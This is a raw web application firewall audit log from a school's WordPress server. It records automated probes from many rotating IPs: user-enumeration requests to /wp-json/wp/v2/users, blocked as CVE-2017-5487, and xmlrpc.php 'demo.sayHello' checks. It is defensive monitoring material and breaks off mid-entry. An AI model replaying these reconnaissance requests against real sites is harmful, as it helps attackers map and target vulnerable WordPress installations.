[04/May/2025:01:45:28 +0700] aBZkSIOgvPi2IO4kz1sCDgAAAJQ 103.236.140.4 50442 103.236.140.4 8181 --786e5d62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --786e5d62-C-- demo.sayHello --786e5d62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --786e5d62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746297928675323 5639 (- - -) Stopwatch2: 1746297928675323 5639; combined=4160, p1=584, p2=3417, p3=25, p4=23, p5=65, sr=116, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --786e5d62-Z-- --f3211104-A-- [04/May/2025:01:48:17 +0700] aBZk8YOgvPi2IO4kz1sCEgAAAJE 103.236.140.4 50458 103.236.140.4 8181 --f3211104-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3211104-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3211104-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298097545038 3251 (- - -) Stopwatch2: 1746298097545038 3251; combined=1451, p1=542, p2=874, p3=0, p4=0, p5=35, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3211104-Z-- --aa1bab55-A-- [04/May/2025:01:48:20 +0700] aBZk9ESOhfQ6W15Bgg8RuAAAAEc 103.236.140.4 50460 103.236.140.4 8181 --aa1bab55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aa1bab55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa1bab55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298100075117 2855 (- - -) Stopwatch2: 1746298100075117 2855; combined=1325, p1=451, p2=844, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa1bab55-Z-- --ca693446-A-- [04/May/2025:01:48:22 +0700] aBZk9ileQJs6d7wanHHU1AAAAM0 103.236.140.4 50466 103.236.140.4 8181 --ca693446-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ca693446-C-- demo.sayHello --ca693446-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca693446-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298102746208 5987 (- - -) Stopwatch2: 1746298102746208 5987; combined=4362, p1=565, p2=3574, p3=34, p4=35, p5=91, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca693446-Z-- --9d7a207c-A-- [04/May/2025:01:48:23 +0700] aBZk94OgvPi2IO4kz1sCEwAAAIA 103.236.140.4 50468 103.236.140.4 8181 --9d7a207c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d7a207c-C-- demo.sayHello --9d7a207c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d7a207c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298103990452 4715 (- - -) Stopwatch2: 1746298103990452 4715; combined=3616, p1=442, p2=2980, p3=23, p4=25, p5=86, sr=75, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d7a207c-Z-- --5d530634-A-- [04/May/2025:01:49:14 +0700] aBZlKsP0ZqGY3Jj2X92cfgAAAAQ 103.236.140.4 50474 103.236.140.4 8181 --5d530634-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5d530634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d530634-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298154101273 3211 (- - -) Stopwatch2: 1746298154101273 3211; combined=1403, p1=458, p2=915, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d530634-Z-- --d2c1f837-A-- [04/May/2025:01:49:17 +0700] aBZlLYOgvPi2IO4kz1sCFQAAAIM 103.236.140.4 50478 103.236.140.4 8181 --d2c1f837-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d2c1f837-C-- demo.sayHello --d2c1f837-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2c1f837-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298157412318 5255 (- - -) Stopwatch2: 1746298157412318 5255; combined=3922, p1=482, p2=3212, p3=23, p4=27, p5=102, sr=68, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2c1f837-Z-- --2999cb17-A-- [04/May/2025:01:49:28 +0700] aBZlOESOhfQ6W15Bgg8RvAAAAFY 103.236.140.4 50482 103.236.140.4 8181 --2999cb17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2999cb17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2999cb17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298168579564 2992 (- - -) Stopwatch2: 1746298168579564 2992; combined=1261, p1=474, p2=760, p3=0, p4=0, p5=27, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2999cb17-Z-- --dcc2e057-A-- [04/May/2025:01:49:33 +0700] aBZlPcP0ZqGY3Jj2X92cgAAAABE 103.236.140.4 50486 103.236.140.4 8181 --dcc2e057-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dcc2e057-C-- demo.sayHello --dcc2e057-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcc2e057-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298173007014 5822 (- - -) Stopwatch2: 1746298173007014 5822; combined=4240, p1=533, p2=3385, p3=116, p4=41, p5=96, sr=78, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcc2e057-Z-- --b928f43c-A-- [04/May/2025:01:49:59 +0700] aBZlV4OgvPi2IO4kz1sCGAAAAIs 103.236.140.4 50502 103.236.140.4 8181 --b928f43c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b928f43c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b928f43c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298199489509 3024 (- - -) Stopwatch2: 1746298199489509 3024; combined=1311, p1=446, p2=835, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b928f43c-Z-- --1330ff0d-A-- [04/May/2025:01:50:02 +0700] aBZlWoOgvPi2IO4kz1sCGQAAAIo 103.236.140.4 50506 103.236.140.4 8181 --1330ff0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1330ff0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1330ff0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298202619385 3174 (- - -) Stopwatch2: 1746298202619385 3174; combined=1328, p1=447, p2=841, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1330ff0d-Z-- --7e474a5e-A-- [04/May/2025:01:50:03 +0700] aBZlW0SOhfQ6W15Bgg8RwAAAAEw 103.236.140.4 50508 103.236.140.4 8181 --7e474a5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7e474a5e-C-- demo.sayHello --7e474a5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e474a5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298203319600 6037 (- - -) Stopwatch2: 1746298203319600 6037; combined=4479, p1=590, p2=3513, p3=34, p4=38, p5=168, sr=78, sw=136, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e474a5e-Z-- --f359c747-A-- [04/May/2025:01:50:04 +0700] aBZlXIOgvPi2IO4kz1sCGgAAAI4 103.236.140.4 50514 103.236.140.4 8181 --f359c747-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f359c747-C-- demo.sayHello --f359c747-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f359c747-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298204976618 4914 (- - -) Stopwatch2: 1746298204976618 4914; combined=3718, p1=439, p2=3064, p3=21, p4=24, p5=98, sr=66, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f359c747-Z-- --3b798373-A-- [04/May/2025:01:50:35 +0700] aBZle0SOhfQ6W15Bgg8RxQAAAFg 103.236.140.4 50520 103.236.140.4 8181 --3b798373-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b798373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b798373-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298235273366 3455 (- - -) Stopwatch2: 1746298235273366 3455; combined=1372, p1=448, p2=891, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b798373-Z-- --ea245122-A-- [04/May/2025:01:50:39 +0700] aBZlf0SOhfQ6W15Bgg8RxwAAAFQ 103.236.140.4 50524 103.236.140.4 8181 --ea245122-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ea245122-C-- demo.sayHello --ea245122-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea245122-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298239401193 6022 (- - -) Stopwatch2: 1746298239401193 6022; combined=4429, p1=581, p2=3619, p3=34, p4=37, p5=94, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea245122-Z-- --32f6ae4e-A-- [04/May/2025:01:51:05 +0700] aBZlmYOgvPi2IO4kz1sCHAAAAI0 103.236.140.4 50528 103.236.140.4 8181 --32f6ae4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --32f6ae4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32f6ae4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298265222464 15489 (- - -) Stopwatch2: 1746298265222464 15489; combined=26398, p1=448, p2=826, p3=0, p4=0, p5=12577, sr=76, sw=0, l=0, gc=12547 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32f6ae4e-Z-- --0bd6e131-A-- [04/May/2025:01:51:09 +0700] aBZlnUSOhfQ6W15Bgg8RyAAAAEc 103.236.140.4 50532 103.236.140.4 8181 --0bd6e131-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.118.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.118.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0bd6e131-C-- demo.sayHello --0bd6e131-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bd6e131-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298269512008 